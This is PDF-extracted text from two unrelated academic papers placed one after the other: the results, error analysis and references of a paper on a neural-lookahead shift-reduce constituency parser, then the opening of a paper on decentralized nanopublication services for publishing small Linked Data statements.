Each constituent hierarchy is generated bottom-up recurrently. In particular, a sequence of state vectors is generated recurrently, with each state yielding a output con- stituent label. The process starts with a ~0 state vec- tor and ends when a NULL constituent is generated. The recurrent state transition process is achieved us- ing an LSTM model with the hidden vectors of the encoder layer being used for context features. Formally, for word wi, the value of the jth state unit sij of the LSTM is computed by: sij = f(sij−1,aij, ←→ hi ) 1, where the context aij is computed by: aij = ∑ k βijk ←→ hk βijk = ef(sij−1, ←→ hk ) ∑ k′ e f(sij−1, ←→ hk′) 1Here, different from typical MT models (Bahdanau et al., 2015), the chain is predicted sequentially in a feed-forward way with no feedback of the prediction made. We found that this fast alternative gives similar results. 50 Here ←→ hk refers to the encoder hidden vector for wk. The weights of contribution βijk are computed using the attention mechanism (Bahdanau et al., 2015). The constituent labels are generated from each state unit sij, where each constituent label yij is the output of a SOFTMAX function, p(yij = l) = e s>ijWl ∑ k e s>ijWk yij = l denotes that the jth label of the ith word is l(l ∈ L). As shown in Figure 4, the SOFTMAX functions are applied to the state units of the decoder, gener- ating hierarchical labels bottom-up, until the default label NULL is predicted. 4.4 Training We use two separate models to assign the s-type and e-type labels, respectively. For training each con- stituent hierarchy predictor, we minimize the follow- ing training objective: L(θ) = − T∑ i Zi∑ j log pijo + λ 2 ||θ||2, where T is the length of the sentence, Zi is the depth of the constituent hierarchy of the word wi, and pijo stands for p(yij = o), which is given by the SOFT- MAX function, and o is the gold label. We apply back-propagation, using momentum stochastic gradient descent (Sutskever et al., 2013) with a learning rate of η = 0.01 for optimization and regularization parameter λ = 10−6. 5 Experiments 5.1 Experiment Settings Our English data are taken from the Wall Street Jour- nal (WSJ) sections of the Penn Treebank (Marcus et al., 1993). We use sections 2-21 for training, section 24 for system development, and section 23 for final performance evaluation. Our Chinese data are taken from the version 5.1 of the Penn Chinese Treebank (CTB) (Xue et al., 2005). We use articles 001- 270 and 440-1151 for training, articles 301-325 for sys- tem development, and articles 271-300 for final per- formance evaluation. For both English and Chinese hyper-parameters value Word embedding size 50 Word window size 2 Character embedding size 30 Character window size 2 LSTM hidden layer size 100 Character hidden layer size 60 Table 3: Hyper-parameter settings s-type e-type parser 1-layer 93.39 81.50 90.43 2-layer 93.76 83.37 90.72 3-layer 93.84 83.42 90.80 Table 4: Performance of the constituent hierarchy predictor and the corresponding parser on the WSJ dev dataset. n-layer denotes an LSTM model with n hidden layers. data, we adopt ZPar2 for POS tagging, and use ten- fold jackknifing to assign POS tags automatically to the training data. In addition, we use ten-fold jack- knifing to assign constituent hierarchies automati- cally to the training data for training the parser using the constituent hierarchy predictor. We use F1 score to evaluate constituent hierarchy prediction. For example, if the prediction is “S → S → VP → NP” and the gold is “S → NP → NP”, the evaluation process matches the two hierarchies bottom-up. The precision is 2/4 = 0.5, the recall is 2/3 = 0.66 and the F1 score is 0.57. A label is counted as correct if and only if it occurs at the cor- rect position. We use EVALB to evaluate parsing performance, including labelled precision (LP ), labelled recall (LR), and bracketing F1.3 5.2 Model Settings For training the constituent hierarchy prediction model, gold constituent labels are derived from la- belled constituency trees in the training data. The hyper-parameters are chosen according to develop- ment tests, and the values are shown in Table 3. For the shift-reduce constituency parser, we set the beam size to 16 for both training and decoding, which achieves a good tradeoff between efficiency 2https://github.com/SUTDNLP/ZPar 3http://nlp.cs.nyu.edu/evalb 51 s-type e-type parser all 93.76 83.37 90.72 all w/o wins 93.62 83.34 90.58 all w/o chars 93.51 83.21 90.33 all w/o chars & wins 93.12 82.36 89.18 Table 5: Performance of the constituent hierarchy predictor and the corresponding parser on the WSJ dev dataset. all denotes the proposed model with- out ablation. wins denotes input windows. chars denotes character-based attention. and accuracy (Zhu et al., 2013). The optimal train- ing iteration number is determined on the develop- ment sets. 5.3 Results of Constituent Hierarchy Prediction Table 4 shows the results of constituent hierarchy prediction, where word and character embeddings are randomly initialized, and fine-tuned during train- ing. The third column shows the development pars- ing accuracies when the labels are used for looka- head features. As Table 4 shows, when the number of hidden layers increases, both s-type and e-type constituent hierarchy prediction improve. The accu- racy of e-type prediction is relatively lower due to right-branching in the treebank, which makes e-type hierarchies longer than s-type hierarchies. In addi- tion, a 3-layer LSTM does not give significant im- provements compared to a 2-layer LSTM. For better tradeoff between efficiency and accuracy, we choose the 2-layer LSTM as our constituent hierarchy pre- dictor. Table 5 shows ablation results for constituent hi- erarchy prediction given by different reduced ar- chitectures, which include an architecture without character embeddings and an architecture with nei- ther character embeddings nor input windows. We find that the original architecture achieves the high- est performance on constituent hierarchy prediction, compared to the two baselines. The baseline only without character embeddings has relatively small influence on constituent hierarchy prediction. On the other hand, the baseline only without input word windows has relatively smaller influence on con- stituent hierarchy prediction. Nevertheless, both of these two ablation architectures lead to lower pars- Parser LR LP F1 Fully-supervised Ratnaparkhi (1997) 86.3 87.5 86.9 Charniak (2000) 89.5 89.9 89.5 Collins (2003) 88.1 88.3 88.2 Sagae and Lavie (2005)† 86.1 86.0 86.0 Sagae and Lavie (2006)† 87.8 88.1 87.9 Petrov and Klein (2007) 90.1 90.2 90.1 Carreras et al. (2008) 90.7 91.4 91.1 Shindo et al. (2012) N/A N/A 91.1 Zhu et al. (2013)† 90.2 90.7 90.4 Socher et al. (2013)* N/A N/A 90.4 Vinyals et al. (2015)* N/A N/A 88.3 Cross and Huang (2016)*† N/A N/A 91.3 Dyer et al. (2016)*† N/A N/A 91.2 This work 91.3 92.1 91.7 Ensemble Shindo et al. (2012) N/A N/A 92.4 Vinyals et al. (2015)* N/A N/A 90.5 Rerank Charniak and Johnson (2005) 91.2 91.8 91.5 Huang (2008) 92.2 91.2 91.7 Dyer et al. (2016)*† N/A N/A 93.3 Semi-supervised McClosky et al. (2006) 92.1 92.5 92.3 Huang and Harper (2009) 91.1 91.6 91.3 Huang et al. (2010) 91.4 91.8 91.6 Zhu et al. (2013)† 91.1 91.5 91.3 Durrett and Klein (2015)* N/A N/A 91.1 Table 6: Comparison of related work on the WSJ test set. * denotes neural parsing; † denotes methods using a shift-reduce framework. ing accuracies. The baseline removing both the character embeddings and the input word windows has a relatively low F-score. 5.4 Final Results For English, we compare the final results with previous related work on the WSJ test sets. As shown in Table 64, our model achieves 1.3% F1 improvement compared to the baseline parser with fully-supervised learning (Zhu et al., 2013). Our model outperforms the state-of-the-art fully- supervised system (Carreras et al., 2008; Shindo et al., 2012) by 0.6% F1. In addition, our fully- supervised model also catches up with many state- of-the-art semi-supervised models (Zhu et al., 2013; 4We treat the methods as semi-supervised if they use pre- trained word embeddings, word clusters (e.g., Brown clusters) or extra resources. 52 Parser LR LP F1 Fully-supervised Charniak (2000) 79.6 82.1 80.8 Bikel (2004) 79.3 82.0 80.6 Petrov and Klein (2007) 81.9 84.8 83.3 Zhu et al. (2013)† 82.1 84.3 83.2 Wang et al. (2015)‡ N/A N/A 83.2 Dyer et al. (2016)*† N/A N/A 84.6 This work 85.2 85.9 85.5 Rerank Charniak and Johnson (2005) 80.8 83.8 82.3 Dyer et al. (2016)*† N/A N/A 86.9 Semi-supervised Zhu et al. (2013)† 84.4 86.8 85.6 Wang and Xue (2014)‡ N/A N/A 86.3 Wang et al. (2015)‡ N/A N/A 86.6 Table 7: Comparison of related work on the CTB5.1 test set. * denotes neural parsing; † denotes methods using a shift-reduce framework; ‡ denotes joint POS tagging and parsing. Huang and Harper, 2009; Huang et al., 2010; Dur- rett and Klein, 2015) by achieving 91.7% F1 on WSJ test set. The size of our model is much smaller than the semi-supervised model of Zhu et al. (2013), which contains rich features from a large automat- ically parsed corpus. In contrast, our model is about the same in size compared to the baseline parser. We carry out Chinese experiments with the same models, and compare the final results with previous related work on the CTB test set. As shown in Table 7, our model achieves 2.3% F1 improvement com- pared to the state-of-the-art baseline system with fully-supervised learning (Zhu et al., 2013), which is by far the best result in the literature. In addition, our fully-supervised model is also comparable to many state-of-the-art semi-supervised models (Zhu et al., 2013; Wang and Xue, 2014; Wang et al., 2015; Dyer et al., 2016) by achieving 85.5% F1 on the CTB test set. Wang and Xue (2014) and Wang et al. (2015) do joint POS tagging and parsing. 5.5 Comparison of Speed Table 8 shows the running times of various parsers on test sets on a Intel 2.2 GHz processor with 16G memory. Our parsers are much faster than the re- lated parser with the same shift-reduce framework (Sagae and Lavie, 2005; Sagae and Lavie, 2006). Compared to the baseline parser, our parser gives Parser #Sent/Second Ratnaparkhi (1997) Unk Collins (2003) 3.5 Charniak (2000) 5.7 Sagae and Lavie (2005) 3.7 Sagae and Lavie (2006) 2.2 Petrov and Klein (2007) 6.2 Carreras et al. (2008) Unk Zhu et al. (2013) 89.5 This work 79.2 Table 8: Comparison of running times on the test set, where the time for loading models is excluded. The running times of related parsers are taken from Zhu et al. (2013). significant improvement on accuracies (90.4% to 91.7% F1) at the speed of 79.2 sentences per sec- ond5, in contrast to 89.5 sentences per second on the standard WSJ benchmark. 6 Error Analysis We conduct error analysis by measuring parsing ac- curacies against: different phrase types, constituents of different span lengths, and different sentence lengths. 6.1 Phrase Type Table 9 shows the accuracies of the baseline and the final parsers with lookahead features on 9 common phrase types. As the results show, while the parser with lookahead features achieves improvements on all of the frequent phrase types, there are relatively higher improvements on VP, S, SBAR and WHNP. The constituent hierarchy predictor has relatively better performance on s-type labels for the con- stituents VP, WHNP and PP, which are prone to errors by the baseline system. The constituent hi- erarchy can give guidance to the constituent parser for tackling the issue. Compared to the s-type con- stituent hierarchy, the e-type constituent hierarchy 5The constituent hierarchy prediction is excluded, which processes an average of 150 sentences per second on a single CPU. The cost of this step is far less than the cost of parsing, and can be essentially eliminated by pipelining the constituent hierarchy prediction and the shift-reduce decoder, by launching the constituent hierarchy predictor first, and then starting pars- ing in parallel as soon as the lookahead output is available for the first sentence, since the lookahead will outpace the parsing from that point forward. 53 2 4 6 8 10 12 14 85 90 95 span length F 1 S co re (% ) baseline lookahead Figure 5: Comparison with the baseline on spans of different lengths. is relatively more difficult to predict, particularly for the constituents with long spans such as VP, S and SBAR. Despite this, the e-type constituent hi- erarchies with relatively low accuracies also benefit prediction of constituents with long spans. 6.2 Span Length Figure 5 shows the F1-scores of the two parsers on constituents with different span lengths. As the re- sults show, lookahead features are helpful on both large spans and small spans, and the performance gap between the two parsers is larger as the size of span increases. This reflects the usefulness of long- range information captured by the constituent hier- archy predictor and lookahead features. 6.3 Sentence Length Figure 6 shows the F1-scores of the two parsers on sentences of different lengths. As the results show, the parser with lookahead features outperforms the baseline system on both short sentences and long sentences. Also, the performance gap between the two parsers is larger as the length of sentence in- creases. The constituent hierarchy predictors generate hi- erarchical constituents for each input word using global information. For longer sentences, the pre- dictors yield deeper constituent hierarchies, offer- ing corresponding lookahead features. As a result, compared to the baseline parser, the performance of the parser with lookahead features decreases more slowly as the length of the sentences increases. 10 20 30 40 50 50+ 85 90 95 F 1 sc or e (% ) baseline lookahead Figure 6: Comparison with the baseline on sen- tences of different lengths. Sentences with length [0, 10) fall in the bin 10. 7 Related Work Our lookahead features are similar in spirit to the pruners of Roark and Hollingshead (2009) and Zhang et al. (2010b), which infer the maximum length of constituents that a particular word can start or end. However, our method is different in three main ways. First, rather than using a CRF with sparse local word window features, a neural network is used for dense global features on the sentence. Second, not only the size of constituents but also the constituent hierarchy is identified for each word. Third, the results are added into a transition-based parser as soft features, rather then being used as hard constraints to a chart parser. Our concept of constituent hierarchies is simi- lar to supertags in the sense that both are shallow parses. For lexicalized grammars such as Combi- natory Categorial Grammar (CCG), Tree-Adjoining Grammar (TAG) and Head-Driven Phrase Structure Grammar (HPSG), each word in the input sentence is assigned one or more supertags, which are used to identify the syntactic role of the word to constrain parsing (Clark, 2002; Clark and Curran, 2004; Car- reras et al., 2008; Ninomiya et al., 2006; Dridan et al., 2008; Faleńska et al., 2015). For a lexical- ized grammar, supertagging can benefit the parsing in both accuracy and efficiency by offering almost- parsing information. In particular, Carreras et al. (2008) used the concept of spine for TAG (Schabes, 1992; Vijay-Shanker and Joshi, 1988), which is sim- ilar to our constituent hierarchy. However, there are three differences. First, the spine is defined to de- scribe the main syntactic tree structure with a series 54 NP VP S PP SBAR ADVP ADJP WHNP QP baseline 92.06 90.63 90.28 87.93 86.93 84.83 74.12 95.03 89.32 with lookahead feature 93.10 92.45 91.78 88.84 88.59 85.64 74.50 96.18 89.63 improvement +1.04 +1.82 +1.50 +0.91 +1.66 +0.81 +0.38 +1.15 +0.31 constituent hierarchy s-type 95.18 97.51 93.37 98.01 92.14 88.94 79.88 96.18 91.70 e-type 91.98 76.82 80.72 84.80 66.82 85.01 71.16 95.13 91.02 Table 9: Comparison between the parsers with lookahead features on different phrases types, with the corresponding constituent hierarchy predictor performances. of unary projections, while constituent hierarchy is defined to describe how words can start or end hi- erarchical constituents (it can be empty if the word cannot start or end constituents). Second, spines are extracted from gold trees and used to prune the search space of parsing as hard constraints. In con- trast, we use constituent hierarchies as soft features. Third, Carreras et al. (2008) use spines to prune chart parsing, while we use constituent hierarchies to improve a linear shift-reduce parser. For lexicalized grammars, supertags can benefit parsing significantly since they contain rich syntac- tic information as almost parsing (Bangalore and Joshi, 1999). Recently, there has been a line of work on better supertagging. Zhang et al. (2010a) proposed efficient methods to obtain supertags for HPSG parsing using dependency information. Xu et al. (2015) and Vaswani et al. (2016) leverage recur- sive neural networks for supertagging for CCG pars- ing. In contrast, our models predict the constituent hierarchy instead of a single supertag for each word in the input sentence. Our constituent hierarchy predictor is also related to sequence-to-sequence learning (Sutskever et al., 2014), which has been successfully used in neural machine translation (Bahdanau et al., 2015). The neural model encodes the source-side sentence into dense vectors, and then uses them to generate target- side word by word. There has also been work that di- rectly applies sequence-to-sequence models for con- stituent parsing, which generates constituent trees given raw sentences (Vinyals et al., 2015; Luong et al., 2015). Compared to Vinyals et al. (2015), who predict a full parse tree from input, our predictors tackle a much simpler task, by predicting the con- stituent hierarchies of each word separately. In ad- dition, the outputs of the predictors are used for soft lookahead features in bottom-up parsing, rather than being taken as output structures directly. By integrating a neural constituent hierarchy pre- dictor, our parser is related to neural network mod- els for parsing, which has given competitive accura- cies for both constituency parsing (Dyer et al., 2016; Cross and Huang, 2016; Watanabe and Sumita, 2015) and dependency parsing (Chen and Manning, 2014; Zhou et al., 2015; Dyer et al., 2015). In par- ticular, our parser is more closely related to neu- ral models that integrate discrete manual features (Socher et al., 2013; Durrett and Klein, 2015). Socher et al. (2013) use neural features to rerank a sparse baseline parser; Durrett and Klein directly in- tegrate sparse features into neural layers in a chart parser. In contrast, we integrate neural information into sparse features in the form of lookahead fea- tures. There has also been work on lookahead features for parsing. Tsuruoka et al. (2011) run a baseline parser for a few future steps, and use the output ac- tions to guide the current action. In contrast to their model, our model leverages full sentential informa- tion, yet is significantly faster. Previous work investigated more efficient parsing without loss of accuracy, which is required by real time applications, such as web parsing. Zhang et al. (2010b) introduced a chart pruner to accelerate a CCG parser. Kummerfeld et al. (2010) proposed a self-training method focusing on increasing the speed of a CCG parser rather than its accuracy. 8 Conclusion We proposed a novel constituent hierarchy predic- tor based on recurrent neural networks, aiming to capture global sentential information. The resulting constituent hierarchies are fed to a baseline shift- reduce parser as lookahead features, addressing lim- itations of shift-reduce parsers in not leveraging 55 right-hand side syntax for local decisions, yet main- taining the same model size and speed. The resulting fully-supervised parser outperforms the state-of-the- art baseline parser by achieving 91.7% F1 on stan- dard WSJ evaluation and 85.5% F1 on standard CTB evaluation. Acknowledgments We thank the anonymous reviewers for their detailed and constructive comments, and the co-Editor-in- Chief Lillian Lee for her extremely detailed copy editing. This work is supported by T2MOE 201301 of Singapore Ministry of Education. Yue Zhang is the corresponding author. References Dzmitry Bahdanau, Kyunghyun Cho, and Yoshua Ben- gio. 2015. Neural machine translation by jointly learning to align and translate. ICLR. Miguel Ballesteros, Chris Dyer, and Noah A. Smith. 2015. Improved transition-based parsing by modeling characters instead of words with LSTMs. In EMNLP, pages 349–359. Srinivas Bangalore and Aravind K. Joshi. 1999. Su- pertagging: An approach to almost parsing. Compu- tational Linguistics, 25(2):237–265, June. Daniel M. Bikel. 2004. On the parameter space of gener- ative lexicalized statistical parsing models. PhD The- sis, University of Pennsylvania. Xavier Carreras, Michael Collins, and Terry Koo. 2008. TAG, dynamic programming, and the perceptron for efficient, feature-rich parsing. In CoNLL, pages 9–16, Morristown, NJ, USA. Association for Computational Linguistics. Eugene Charniak and Mark Johnson. 2005. Coarse-to- fine n-best parsing and MaxEnt discriminative rerank- ing. In ACL. Eugene Charniak. 2000. A maximum-entropy-inspired parser. In ANLP, pages 132–139. Danqi Chen and Christopher Manning. 2014. A fast and accurate dependency parser using neural networks. In EMNLP, pages 740–750, Stroudsburg, PA, USA. As- sociation for Computational Linguistics. Kyunghyun Cho, Bart van Merrienboer, Çaglar Gülçehre, Dzmitry Bahdanau, Fethi Bougares, Holger Schwenk, and Yoshua Bengio. 2014. Learning phrase represen- tations using RNN encoder-decoder for statistical ma- chine translation. In EMNLP, pages 1724–1734. Stephen Clark and James R. Curran. 2004. The impor- tance of supertagging for wide-coverage CCG pars- ing. In COLING, pages 282–288, Morristown, NJ, USA, August. University of Edinburgh, Association for Computational Linguistics. Stephen Clark. 2002. Supertagging for combinatory cat- egorial grammar. In Proceedings of the Sixth Inter- national Workshop on Tree Adjoining Grammar and Related Frameworks, pages 101–106, Universita di Venezia. Michael Collins and Brian Roark. 2004. Incremental parsing with the perceptron algorithm. In ACL, Mor- ristown, NJ, USA. Association for Computational Lin- guistics. Michael Collins. 2003. Head-driven statistical models for natural language parsing. Computational Linguis- tics, 29(4):589–637. James Cross and Liang Huang. 2016. Span-based con- stituency parsing with a structure-label system and provably optimal dynamic oracles. In EMNLP. Rebecca Dridan, Valia Kordoni, and Jeremy Nicholson. 2008. Enhancing performance of lexicalised gram- mars. In ACL. Greg Durrett and Dan Klein. 2015. Neural CRF parsing. In ACL, pages 302–312. Chris Dyer, Miguel Ballesteros, Wang Ling, Austin Matthews, and Noah A. Smith. 2015. Transition- based dependency parsing with stack long short-term memory. In ACL-IJCNLP, pages 334–343. Chris Dyer, Adhiguna Kuncoro, Miguel Ballesteros, and Noah A. Smith. 2016. Recurrent neural network grammars. In NAACL, pages 199–209. Agnieszka Faleńska, Anders Björkelund, Özlem Çetinoğlu, and Wolfgang Seeker. 2015. Stacking or supertagging for dependency parsing – what’s the difference? In Proceedings of the 14th International Conference on Parsing Technologies. Joshua Goodman. 1998. Parsing inside-out. PhD thesis, Harvard University. Alex Graves and Jürgen Schmidhuber. 2008. Offline handwriting recognition with multidimensional recur- rent neural networks. In NIPS, pages 545–552. Alex Graves, Navdeep Jaitly, and Abdel-rahman Mo- hamed. 2013. Hybrid speech recognition with deep bidirectional LSTM. In IEEE Workshop on Automatic Speech Recognition & Understanding (ASRU), pages 273–278. IEEE. Sepp Hochreiter and Jürgen Schmidhuber. 1997. Long short-term memory. Neural Computation, 9(8):1735– 1780, November. Zhongqiang Huang and Mary P. Harper. 2009. Self- training PCFG grammars with latent annotations across languages. In EMNLP, pages 832–841. 56 Zhongqiang Huang, Mary P. Harper, and Slav Petrov. 2010. Self-training with products of latent variable grammars. In EMNLP, pages 12–22. Liang Huang. 2008. Forest reranking: Discriminative parsing with non-local features. In ACL, pages 586– 594. Yoon Kim, Yacine Jernite, David Sontag, and Alexan- der M. Rush. 2016. Character-aware neural language models. In AAAI. Jonathan K. Kummerfeld, Jessika Roesner, Tim Daw- born, James Haggerty, James R. Curran, and Stephen Clark. 2010. Faster parsing by supertagger adap- tation. In ACL, pages 345–355. University of Cam- bridge, Association for Computational Linguistics, July. Minh-Thang Luong, Quoc V. Le, Ilya Sutskever, Oriol Vinyals, and Lukasz Kaiser. 2015. Multi-task se- quence to sequence learning. ICLR. Mitchell P. Marcus, Beatrice Santorini, and Mary Ann Marcinkiewicz. 1993. Building a large annotated cor- pus of English: The Penn treebank. Computational Linguistics, 19(2):313–330. David McClosky, Eugene Charniak, and Mark Johnson. 2006. Effective self-training for parsing. In HLT- NAACL, pages 152–159, Morristown, NJ, USA. As- sociation for Computational Linguistics. Takashi Ninomiya, Takuya Matsuzaki, Yoshimasa Tsu- ruoka, Yusuke Miyao, and Jun’ichi Tsujii. 2006. Ex- tremely lexicalized models for accurate and fast HPSG parsing. In EMNLP, pages 155–163. University of Manchester, Association for Computational Linguis- tics, July. Slav Petrov and Dan Klein. 2007. Improved inference for unlexicalized parsing. In HLT-NAACL, pages 404– 411. Adwait Ratnaparkhi. 1997. A linear observed time sta- tistical parser based on maximum entropy models. In EMNLP. Brian Roark and Kristy Hollingshead. 2009. Linear complexity context-free parsing pipelines via chart constraints. In HLT-NAACL, pages 647–655. Kenji Sagae and Alon Lavie. 2005. A classifier-based parser with linear runtime complexity. In IWPT, pages 125–132, Morristown, NJ, USA. Association for Com- putational Linguistics. Kenji Sagae and Alon Lavie. 2006. Parser combination by reparsing. In HLT-NAACL, pages 129–132, Mor- ristown, NJ, USA. Association for Computational Lin- guistics. Cicero D. Santos and Bianca Zadrozny. 2014. Learning character-level representations for part-of-speech tag- ging. In ICML, pages 1818–1826. Yves Schabes. 1992. Stochastic tree-adjoining gram- mars. In Proceedings of the workshop on Speech and Natural Language, pages 140–145. Association for Computational Linguistics. Mike Schuster and Kuldip K. Paliwal. 1997. Bidirec- tional recurrent neural networks. Signal Processing, IEEE transaction, 45(11):2673–2681. Hiroyuki Shindo, Yusuke Miyao, Akinori Fujino, and Masaaki Nagata. 2012. Bayesian symbol-refined tree substitution grammars for syntactic parsing. In ACL, pages 440–448. Richard Socher, John Bauer, Christopher D. Manning, and Andrew Y. Ng. 2013. Parsing with compositional vector grammars. In ACL, pages 455–465. Ilya Sutskever, James Martens, George E. Dahl, and Ge- offrey E. Hinton. 2013. On the importance of ini- tialization and momentum in deep learning. In ICML, pages 1139–1147. Ilya Sutskever, Oriol Vinyals, and Quoc V. Le. 2014. Sequence to sequence learning with neural networks. In NIPS, pages 3104–3112. Yoshimasa Tsuruoka, Yusuke Miyao, and Jun’ichi Kazama. 2011. Learning with lookahead: Can history-based models rival globally optimized models? In CoNLL, pages 238–246. Ashish Vaswani, Yonatan Bisk, and Kenji Sagae. 2016. Supertagging with LSTMs. In NAACL. K. Vijay-Shanker and Aravind K. Joshi. 1988. A study of tree adjoining grammars. Citeseer. Oriol Vinyals, Lukasz Kaiser, Terry Koo, Slav Petrov, Ilya Sutskever, and Geoffrey E. Hinton. 2015. Gram- mar as a foreign language. In NIPS, pages 2773–2781. Zhiguo Wang and Nianwen Xue. 2014. Joint POS tag- ging and transition-based constituent parsing in Chi- nese with non-local features. In ACL, pages 733–742, Stroudsburg, PA, USA. Association for Computational Linguistics. Zhiguo Wang, Haitao Mi, and Nianwen Xue. 2015. Feature optimization for constituent parsing via neu- ral networks. In ACL-IJCNLP, pages 1138–1147, Stroudsburg, PA, USA. Association for Computational Linguistics. Taro Watanabe and Eiichiro Sumita. 2015. Transition- based neural constituent parsing. In ACL, pages 1169– 1179. Wenduan Xu, Michael Auli, and Stephen Clark. 2015. CCG supertagging with a recurrent neural network. In ACL-IJCNLP, pages 250–255, Stroudsburg, PA, USA. Association for Computational Linguistics. Naiwen Xue, Fei Xia, Fu-dong Chiou, and Martha Palmer. 2005. The Penn Chinese treebank: Phrase structure annotation of a large corpus. Natural Lan- guage Engineering, 11(2):207–238. 57 Yue Zhang and Stephen Clark. 2009. Transition-based parsing of the Chinese treebank using a global discrim- inative model. In ICPT, pages 162–171, Morristown, NJ, USA. Association for Computational Linguistics. Yue Zhang and Stephen Clark. 2011. Syntactic process- ing using the generalized perceptron and beam search. Computational Linguistics, 37(1):105–151. Yaozhong Zhang, Takuya Matsuzaki, and Jun’ichi Tsu- jii. 2010a. A simple approach for HPSG supertag- ging using dependency information. In NAACL-HLT, pages 645–648. University of Manchester, Association for Computational Linguistics, June. Yue Zhang, Byung-Gyu Ahn, Stephen Clark, Curt Van Wyk, James R. Curran, and Laura Rimell. 2010b. Chart pruning for fast lexicalised-grammar parsing. In COLING, pages 1471–1479. Hao Zhou, Yue Zhang, Shujian Huang, and Jiajun Chen. 2015. A neural probabilistic structured-prediction model for transition-based dependency parsing. In ACL, pages 1213–1222. Muhua Zhu, Yue Zhang, Wenliang Chen, Min Zhang, and Jingbo Zhu. 2013. Fast and accurate shift-reduce con- stituent parsing. In ACL, pages 434–443. 58 work_22tktt3z4fczfipon3agmpyoeq ---- Semantic micro-contributions with decentralized nanopublication services Semantic micro-contributions with decentralized nanopublication services Tobias Kuhn1, Ruben Taelman2, Vincent Emonet3, Haris Antonatos4, Stian Soiland-Reyes5,6 and Michel Dumontier3 1 Department of Computer Science, VU Amsterdam, Amsterdam, Netherlands 2 IDLab, Ghent University, Ghent, Belgium 3 Institute of Data Science, Maastricht University, Maastricht, Netherlands 4 SciFY, Athens, Greece 5 Informatics Institute, University of Amsterdam, Amsterdam, Netherlands 6 Department of Computer Science, The University of Manchester, Manchester, UK ABSTRACT While the publication of Linked Data has become increasingly common, the process tends to be a relatively complicated and heavy-weight one. Linked Data is typically published by centralized entities in the form of larger dataset releases, which has the downside that there is a central bottleneck in the form of the organization or individual responsible for the releases. Moreover, certain kinds of data entries, in particular those with subjective or original content, currently do not fit into any existing dataset and are therefore more difficult to publish. To address these problems, we present here an approach to use nanopublications and a decentralized network of services to allow users to directly publish small Linked Data statements through a simple and user-friendly interface, called Nanobench, powered by semantic templates that are themselves published as nanopublications. The published nanopublications are cryptographically verifiable and can be queried through a redundant and decentralized network of services, based on the grlc API generator and a new quad extension of Triple Pattern Fragments. We show here that these two kinds of services are complementary and together allow us to query nanopublications in a reliable and efficient manner. We also show that Nanobench makes it indeed very easy for users to publish Linked Data statements, even for those who have no prior experience in Linked Data publishing. Subjects Human-Computer Interaction, Digital Libraries, World Wide Web and Web Science Keywords Nanopublications, Semantic Web, Linked data, Semantic publishing INTRODUCTION Linked Data has achieved remarkable adoption (Bizer, Heath & Berners-Lee, 2011; Schmachtenberg, Bizer & Paulheim, 2014), but its publication has remained a complicated issue. The most popular methods for publishing Linked Data include subject pages (Berners-Lee, 2009), SPARQL endpoints (Feigenbaum et al., 2013), and data dumps. The latter are essentially just RDF files on the web. Such files are not regularly indexed on a global scale by any of the existing search engines and therefore often lack discoverability, but they are the only option that does not require the setup of a web server for users wanting to publish Linked Data on their own. While one of the fundamental ideas behind the web is that anyone should be able to express themselves, Linked Data publishing is therefore mostly done by large centralized entities such as DBpedia (Auer et al., 2007) and How to cite this article Kuhn T, Taelman R, Emonet V, Antonatos H, Soiland-Reyes S, Dumontier M. 2021. Semantic micro-contributions with decentralized nanopublication services. PeerJ Comput. Sci. 7:e387 DOI 10.7717/peerj-cs.387 Submitted 26 August 2020 Accepted 19 January 2021 Published 8 March 2021 Corresponding author Tobias Kuhn, t.kuhn@vu.nl Academic editor Chiara Ghidini Additional Information and Declarations can be found on page 19 DOI 10.7717/peerj-cs.387 Copyright 2021 Kuhn et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.387 mailto:t.�kuhn@�vu.�nl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.387 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ Wikidata (Vrandečić & Krötzsch, 2014). Even such community-driven datasets have clear guidelines on what kind of data may be added and typically do not allow for subjective or original content, such as personal opinions or new scientific findings that have otherwise not yet been published. It is therefore difficult for web users to publish their own personal pieces of Linked Data in a manner that the published data can be easily discovered, queried, and aggregated. To solve these shortcomings, we propose here a complementary approach to allow for what we call semantic micro-contributions. In contrast to the existing Linked Data publishing paradigms, semantic micro-contributions allow individual web users to easily and independently publish small snippets of Linked Data. We show below how such semantic micro-contributions can be achieved with nanopublications and semantic templates, and how we can make such a system redundant and reliable with a decentralized network of services. We will explain below how this approach differs from other decentralization approaches that have been proposed in the context of Linked Data publishing (including Solid and Blockchain-based approaches). Concretely, we investigate here the research question of how we can build upon the existing nanopublication publishing ecosystem to provide query services and intuitive user interfaces that allow for quick and easy publishing of small Linked Data contributions in a decentralized fashion. Our concrete contributions are: 1. a concrete scheme of how nanopublications can be digitally signed and thereby reliably linked to user identities, 2. two complementary sets of nanopublication query services building upon extensions of existing Linked Data technologies, one based on the grlc API generator and the other one in the form of an extension of Triple Pattern Fragments called Quad Pattern Fragments (QPF), 3. a user interface connecting to these services that allows for simple nanopublication publishing based on the new concept of nanopublication templates, and 4. positive evaluation results on the above-mentioned query services and user interface. Below, we outline the relevant background, introduce the details of our approach, present and discuss the design and results of two evaluations, and outline future work. BACKGROUND Before we introduce our approach, we give here the relevant background in terms of our own previous work, and other related research on the topics of the use of semantic technologies for scientific publishing, Linked Data APIs, and decentralization. Under the label of semantic publishing (Shotton, 2009), a number of approaches have been presented to align research and its outcomes with Linked Data in order to better organize, aggregate, and interpret scientific findings and science as a whole. We have previously argued that these Linked Data representations should ideally come directly from the authors (i.e., the researchers), should cover not just metadata properties but the content of the scientific findings themselves, and should become the main publication object instead of papers with narrative text, in what we called genuine semantic publishing Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 2/23 http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ (Kuhn & Dumontier, 2017). Nanopublications (Mons et al., 2011) are one of the most prominent proposals to implement this. They are small independent pieces of Linked Data that encapsulate atomic statements in the form of a few RDF triples (this part is called the assertion graph) together with formal provenance information (the provenance graph, e.g., pointing to the study that the assertion was derived from) and metadata (the publication info graph, e.g., by whom and when was the nanopublication created). While the original nanopublication proposal focused on assertions with domain statements (such as expressing a link between a gene and a disease), we subsequently suggested to broaden their scope and to use them also to express bibliographic and other meta-level information, statements about other nanopublications, vocabulary definitions, and generally any kind of small and coherent snippet of Linked Data (Kuhn et al., 2013). In order to make nanopublications verifiable and to enforce their immutability, we then showed 